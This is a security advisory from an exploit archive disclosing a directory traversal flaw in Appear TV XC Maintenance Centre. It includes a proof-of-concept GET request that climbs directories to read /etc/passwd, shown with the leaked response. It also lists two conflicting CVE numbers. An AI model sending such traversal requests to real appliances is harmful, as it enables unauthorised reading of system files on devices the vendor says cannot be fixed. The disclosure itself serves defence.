what you don't know can hurt you

Appear TV XC Hardware Maintenance Centre Directory Traversal

Appear TV XC Hardware Maintenance Centre Directory Traversal
Posted Apr 13, 2018
Authored by IS Threat Team

Appear TV XC Hardware Maintenance Centre suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
advisories | CVE-2018-7539
MD5 | 1c1b1d52d1d18ad5702c3a09e4ccf1f4

Appear TV XC Hardware Maintenance Centre Directory Traversal

Change Mirror Download
CVE-2018-7539 Directory Traversal on Appear TV Maintenance centre 8088

Discoverer: Arqiva Threat Team

Person Karl W


Product: Appear TV XC Hardware Maintenance Centre on port TCP/8088



Vendor : Appear TV



Code Versions: All Version



Vulnerability: Directory Traversal



Impact: It is possible to read OS files with specially crafted URL



Attack Type: Remote



CVE: CVE-2017-12544



------------------------------------------
Description

The web server (fuzzd/0.1.1) running the Maintenance Center on port TCP/8088 allows an attacker to use a specially crafted URL to read Operating System (OS) files.
This vulnerability was used in the full compromise of the appliance.

------------------------------------------



Proof code:


Request:


GET /../../../../../../../../../../../../etc/passwd
Host: x.x.x.x:8088
User-Agent: curl/7.56.1

Accept: */*


Response:


HTTP/1.1 200 OK
Content-Length: 1110
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=3600
Server: fuzzd/0.1.1

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin



------------------------------------------



[Reference]

https://www.appeartv.com/xc5000xc5100/



------------------------------------------



vendor confirmed and acknowledged the vulnerability



Advised work around by disabling Maintenance Centre when not in use.

Advised not able to fix.



------------------------------------------


Regards

Karl W


_________________________________________________________________________________________________

This email, its content and any files transmitted with it are for the personal attention of the addressee only, any other usage or access is unauthorised. It may contain information which could be confidential or privileged. If you are not the intended addressee you may not copy, disclose, circulate or use it.

If you have received this email in error, please destroy it and notify the sender by email. Any representations or commitments expressed in this email are subject to contract.

Although we use reasonable endeavours to virus scan all sent emails, it is the responsibility of the recipient to ensure that they are virus free and we advise you to carry out your own virus check before opening any attachments. We cannot accept liability for any damage sustained as a result of software viruses. We reserve the right to monitor email communications through our networks.

Arqiva Limited. Registered office: Crawley Court, Winchester, Hampshire SO21 2QA United Kingdom Registered in England and Wales number 2487597

_________________________________________________________________________________________________

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close